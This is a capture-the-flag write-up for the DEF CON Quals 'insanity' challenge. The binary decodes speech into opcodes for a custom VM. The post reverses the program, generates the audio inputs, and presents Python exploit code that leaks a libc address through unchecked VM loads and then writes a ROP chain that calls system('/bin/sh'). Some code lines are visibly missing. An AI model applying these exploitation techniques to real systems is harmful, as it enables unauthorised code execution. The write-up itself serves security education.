DEF CON Quals were this weekend, and as always, they delivered some of the hardest pwning challenges we’ve seen this year. insanity was not even one of them, but we still spent several hours solving it, and had tons of fun. The concept is a classic: The program implements a custom VM with weird operations, and you have to reverse and exploit it…

There is a slight twist though: insanity accepts its input as “voice commands”, encoded as a 16 kHz, 8-bit audio file. TL;DR here is the full exploit for your listening pleasure:

But let’s cut to it. The program uses the PocketSphinx library for speech recognition. Here is the code of the main function:

// ...

/* stack buffers (not in correct order)

RSP+X    name                      description

0xe0     vm.mem[8000]              1000 qwords of VM memory
0x32030  input_buf[0x10000]        current chunk of zlib-compressed user input
0x22030  samples_8bit[0x10000]     decompressed chunk, 0x10000 8-bit audio samples,
                                   XORed with 0x80
0x2020   samples_16bit[0x20000]    expanded 16-bit samples

v4 = ps_args(0LL);
cmd_line = cmd_ln_init(
if ( cmd_line )
  decoder = ps_init(cmd_line);
  if ( decoder )
    n = 2;
    vm.mem[0] = (unsigned __int64)&vm | 0x8000000000000000LL;
    while ( 1 )
      // [[ 1 ]] read input size
      v7 = read(0, (char *)&input_size, 4uLL);
      if ( v7 <= 0 )
        goto LABEL_20;
      if ( !input_size )
      ps_start_utt(decoder, (char *)&input_size);
      write(1, ".", 1uLL);
      memset(&zlib_state, 0, sizeof(zlib_state));
      zlib_status = inflateInit_(&zlib_state, "1.2.8", 112LL);
      // ...
      input_size_truncated = input_size;
      if ( input_size )
        if ( zlib_status != 1 )
          if ( input_size >= 0x10001 )
            input_size_truncated = 0x10000;
          already_read = 0;

          // [[ 2 ]] read chunk as stream and decompress it using zlib
          while ( 1 )
            read_bytes = read(0, &input_buf[already_read], input_size_truncated - already_read);
            if ( !read_bytes )
            already_read += read_bytes;
            if ( input_size_truncated <= already_read )
              input_size -= input_size_truncated;
              zlib_state.avail_in = input_size_truncated;
              zlib_state.next_in = input_buf;
              while ( 1 )
                zlib_state.avail_out = 0x10000;
                zlib_state.next_out = samples_8bit;
                zlib_status_1 = inflate(&zlib_state, 0LL);
                zlib_status = zlib_status_1;
                // ...
                number_of_samples = 0x10000LL - zlib_state.avail_out;
                in = (__m128i *)samples_8bit;
                out = (__m128i *)samples_16bit;
                number_of_256bit_blocks = ((0x10000 - (unsigned __int64)zlib_state.avail_out) >> 5) + 1;
                // [[ 3 ]] XOR 8-bit samples with 0x80 and expand them to 16-bit
                xor = _mm_stream_load_si128((__m128i *)xor_pattern);
                  a = _mm_stream_load_si128(in);
                  b = _mm_stream_load_si128(in + 1);
                  _mm_stream_si128(out, _mm_xor_si128(_mm_unpacklo_epi8(0LL, a), xor));
                  _mm_stream_si128(out + 1, _mm_xor_si128(_mm_unpackhi_epi8(0LL, a), xor));
                  _mm_stream_si128(out + 2, _mm_xor_si128(_mm_unpacklo_epi8(0LL, b), xor));
                  _mm_stream_si128(out + 3, _mm_xor_si128(_mm_unpackhi_epi8(0LL, b), xor));
                  out += 4;
                  in += 2;
                while ( number_of_256bit_blocks );
                ps_process_raw(decoder, (_WORD *)samples_16bit, number_of_samples, 0LL, 0LL);
                if ( zlib_state.avail_out )
                  goto LABEL_7;
        goto LABEL_20;
      // ...
      vm_opcode = 0;
      i = 0;

      // [[ 4 ]] Use pocketsphinx to create a hypothesis string for the
      //         given audio
      hyp_string = (char *)ps_get_hyp(decoder, &best_score, out_uttid);
      while ( hyp_string[i] && (unsigned int)(n - 2) <= 0x3E8 )
        if ( !memcmp(&hyp_string[i], "insanity ", 9uLL) )
          i += 9;
          if ( memcmp(&hyp_string[i], "insane", 7uLL) )
            // [[ 5 ]] If the string does not match the pattern
            //         "insanity "*X + "insane", read the next chunk
            goto read_next_chunk;
          vm_opcode_ = vm_opcode;
          i += 7;
          vm_opcode = 0;
          vm.mem[n++] = vm_opcode_;
    /* ... now execute the VM code we just read */

So, how does it work?

The program reads a series of data chunks from the user, each prefixed by their length (packed as a little-endian DWORD). It decompresses every chunk using zlib and XORs every byte with 0x80. The samples get expanded to 16 bits by multiplying the values with 0x100.

At this point, we made a stupid reversing mistake that made the challenge more diffult than necessary for us: We thought that file had to fit into a buffer of size 0x10000. At 16 kHz, this makes each chunk at most 4 seconds in playback time, which is not very much. In fact however, the input is streamed into the PocketSphinx library, so it could be as large as we want.

Each audio chunk is then individually passed to the PocketSphinx library for recognition. The program assumes that the recognized string has the form "insanity "*X + "insane" for some integer X. The value X is then appended to the VM memory and will later be interpreted as a VM instruction.

If recognition succeeds (as in, returns some hypothesis string), but does not yield a string of the correct format, the program simply continues to read chunks. This means that if we send a fake chunk with non-audio data and then end with 4 zero bytes, we control the contents of the samples_8bit buffer completely. This behaviour will turn out to be useful in the actual exploit.

Pretty insane so far? Yeah we though so too.

Generating the numbers 1 to 8

We tried several methods of generating the audio files, and ended up with something that works at least up the value 8, which was enough for our purposes:

  1. Use the macOS speech synthesizer to create the sentence: say -v samantha -o sound.aiff insanity insanity ... insane.
  2. Convert to 16-bit, 16 kHz WAV using ffmpeg: ffmpeg -i sound.aiff -ar 16000 sound.wav.
  3. For values 6 and above, do manual post-processing to bring the playback time down to under 4 seconds (the limit which we thought we had). We used audacity to cut off some silence in the beginning and end of the file, truncate the last word a bit and increase the tempo by ~35%.
  4. Read the 16-bit samples from the audio file and convert them to 8-bit using rounding. This step could have easily been done using ffmpeg -a pcm_u8, but this gave us worse recognition results than with the rounding for our sped up speech samples.
  5. XOR every sample with 0x80.

Shout out to Samantha for lending us her easily recognizable voice. You might want to listen to the resulting value 8 (in case you missed it in the exploit above, or you are simply slowly going insane just as we did during the development of this exploit):

Here is Python code that automates the last two steps:

sound_files = [None]
sound_files += ['%s/raw_%d.wav' % (sounds_dir, i) for i in range(1,6)]
sound_files += ['%s/short_%d.wav' % (sounds_dir, i) for i in range(6,9)]

def get_sound(num):
    samples = 0
    block = []
    with open(sound_files[num]) as f: # consume header
        while True:
            lo =
            if not lo: break
            hi =
            # we pack the 16-bit word into one byte via rounding
            lo = ord(lo)
            hi = ord(hi)
            if lo > 0x100/2:
            hi = min(hi,0xff)
            # somehow everything gets XOR'ed with 0x80
    assert samples <= 0x10000
    return ''.join(block)

And here is some sample code that sends a series of VM commands:

def pack_chunk(chunk):
    chunk = zlib.compress(chunk)
    return struct.pack('<I', len(chunk)) + chunk

code = [1, 3, 3, 7]

TARGET = ('<host>', port)
s = socket.create_connection(TARGET)
for c in code:
s.sendall(struct.pack('<I', 0))   # end packet

The VM

The virtual machine implemented by the program is fairly simple. It’s a stack based machine, operating on 8 byte values which can either be strings or integers. Strings are stored as pointers to null-terminated strings and marked as such by setting the MSB to 1. The stack grows upwards, towards higher addresses. After all code is read into the program, a 0 is placed directly behind the code, and the stack pointer is set to point there (i.e. the stack begins right after the code). Additionally, the first two values (before the code, at offset 0 and 1) are string pointers to the memory itself and to the decoded input string (“insanity insanity …”). The final layout the looks something like this:

+--------+        +--> "insanity insanity ..."
|   +----+---+----+---+--------+--------+--------+--------+--------+  
+-->|  str   |  str   | instr0 | instr1 | ...    |  zero  | ....   | 
                       ^                          ^
                       | IP                       | SP

It should be noted that nothing prevents SP from pointing into code (and IP from pointing into the stack for that matter). As such we control the initial stack by writing the values after our instructions and removing the trailing zero (e.g. by issuing an add as first instruction).

The VM implements the following opcodes:

0: Exit
exits the interpreter loop and thus causes main() to return

1: Insanity
Pushes the string “insanity” onto the stack

2: Add
Pops two values from the stack and writes their sum back. In case the two values are strings, the function will concatenate the strings (into a newly allocated buffer). However, it fails to set the MSB of the resulting pointer. A pointer into the heap is thus treated as an integer

3: Sub
Subtracts the two values on the top of the stack. Only works for integers

4: Mul
Multiplies the two values on the top of the stack. Only works for integers

5: Cmp
Compares the two values on the stack and pushes either 1 (equal) or 0 (not equal) onto the stack. Works for integers and strings

6: Load
Loads an integer value from one of the two string pointers stored at the beginning of the virtual memory. The offset is popped from the stack. There is no bounds checking, so this enables a relative read past the virtual memory buffer

7: Store
Stores the value at SP - 1 into the virtual address at SP. No bounds checking is performed, so this gives us an arbitrary write past the virtual memory buffer.

8: Cond. Jmp
If the value at SP - 1 is not equal to 0, this performs a jump to the virtual address at SP. No bounds checking is performed on the virtual address.

9: ItoA
Converts the lower byte of the value at SP into a newly allocated string and pushes that onto the stack

10+: Push
This pushes opcode - 10 onto the stack. I.e. the opcode 14 would push the value 4 onto the stack.

Since we are somewhat limited in the values we can write to the initial stack, we have to generate large integer values ourselves. The following Python code implements this:

    def calc(v):
        """Calculate v on the stack."""
        def calc_rec(v):
            if v != 0:
                calc_rec(v >> 1)
                if v % 2 == 1:

We now have everything we need to finish the exploit.


The binary is compiles as PIE, as such, we require an information leak first. This is quite easy though: since we have an unbounded read relative to the base address of the VM memory, which is located on the stack, we can read the return address of main() into our program, add an offset to it, and write the resulting value back onto the stack. We will need multiple reads and writes for the final exploit, and thus need to load multiple large values onto the stack. Since this is somewhat cumbersome with our current setup, we would first like to pivot execution into an area of memory that we fully control: the zlib output buffer, which is located behind the virtual memory buffer. To do that, we will supply a small program that will simply perform a long jump into the start of the decompression buffer:

push(1)         # The conditional for the jmp, must be != 0

We can now write arbitrary bytecode. The final steps are fairly straightforward: We assemble a very short ROP chain on the stack that will load a pointer to the string “/bin/sh” (found in the libc) into rdi, then jump to system(). Implemented in “Insanity”, this looks as follows:

push(33779)     # Push offset to return address from memory buffer onto the stack
load(0)         # Load return address onto the stack.
                # '0' selects the string at offset 0 in the virtual memory, which points to itself
push(offset_system - offset___libc_start_main_ret)
add()           # Add offset to leaked libc address
push(33781)     # Push new offset, 2 qwords behind return address
store()         # Trigger out-of-bounds write

                # Repeat ...
push(offset_str_bin_sh - offset___libc_start_main_ret)

push(offset_pop_rdi - offset___libc_start_main_ret)

# Trigger ROP chain

The final exploit can be found here.